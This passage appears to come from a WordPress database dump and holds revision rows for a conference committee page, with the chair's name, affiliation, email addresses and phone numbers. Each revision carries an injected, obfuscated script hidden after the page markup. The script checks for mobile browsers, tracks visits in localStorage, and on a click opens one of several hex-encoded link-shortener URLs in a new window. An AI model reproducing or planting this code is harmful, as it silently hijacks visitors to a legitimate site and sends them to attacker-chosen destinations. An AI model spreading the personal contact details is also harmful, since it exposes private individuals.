_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 08:44:03','2023-06-27 08:44:03','',4849,'https://gsw2023.com/?p=4872',0,'revision','',0),
(4873,4,'2023-06-27 08:54:43','2023-06-27 08:54:43','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"full\" style=\"vc_box_rounded\"][vc_hoverbox image=\"4614\"]Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.[/vc_hoverbox][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 14pt;\"><strong>Chair</strong></span>\r\n\r\n<hr />\r\n\r\n<span style=\"font-size: 12pt;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 08:54:43','2023-06-27 08:54:43','',4849,'https://gsw2023.com/?p=4873',0,'revision','',0),
(4874,4,'2023-06-27 09:01:02','2023-06-27 09:01:02','[vc_row][vc_column width=\"1/4\"][vc_column_text]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Chair</strong></span></p>\r\n[/vc_column_text][vc_single_image image=\"4614\" img_size=\"full\" style=\"vc_box_rounded\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]\r\n\r\n<span style=\"font-size: 12pt;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 